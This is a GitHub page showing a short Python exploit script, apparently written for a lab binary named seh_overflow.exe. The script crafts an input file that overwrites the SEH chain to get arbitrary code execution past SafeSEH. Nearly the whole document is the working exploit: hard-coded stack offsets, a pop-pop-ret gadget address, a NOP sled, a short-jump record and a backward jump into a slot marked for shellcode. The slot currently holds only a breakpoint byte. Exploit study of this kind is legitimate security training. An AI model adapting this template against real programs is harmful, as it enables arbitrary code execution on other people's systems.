-
Notifications
You must be signed in to change notification settings - Fork 2
/
exploit_seh_overflow.py
executable file
·48 lines (34 loc) · 1.62 KB
/
exploit_seh_overflow.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# Name : Abhinav Thakur
# Email: [email protected]
# Description: This exploit takes advantage of a buffer overflow using SEH linked list overwrite to
# bypassing SAFE SEH to achieve arbitrary code execution.
# Usage : seh_overflow.exe C:\malacious_input_file.bin
# Useful information
# 12fb6c : address of buffer
# 12ffc4 : address of return pointer (1112 bytes from buffer)
# 12ffb0 : SEH ddlinked list (1092 bytes from buffer) (12ffe0 4016f5)
# fread() is asking for 2048 bytes
# offset to return pointer = 1112 bytes
# after finding "\xcc" by >'lm' and >'s seh_overflow l6000 cc' at address 40109a
# we overwrite the function pointer with 40109a to see the status of current
# registers and stack to find a relative address to jump to shellcode. We get
# the an in range stack address $esp+0x8 (12ffb0). But this adderss is just
# before our function pointer(exception handler). So we now find the instruction
# 'jmp esp+0x8' in the modules.
# 004015c1 5b pop ebx
# 004015c2 5d pop ebp
# 004015c3 c3 ret
# e9 af fb ff ff : jmp 12fb6c
import struct
# Put up the shellcode here
shellcode = ("\xcc")
payload = '\x90' * (1092 - len(shellcode))
payload += shellcode
payload += struct.pack("I", 0x000006eb) # next exception pointer
payload += struct.pack("I", 0x4015c1) # function pointer point to pop pop ret in .code segment
#payload += "\xcc\xcc\xcc\xcc"
payload += "\xe9\xaf\xfb\xff\xff" # jmp 0x0012fb6c
payload += "\x90" * (1112 - 5)
fo = open('C:\malacious_input_file.bin', 'w')
fo.write(payload)
fo.close()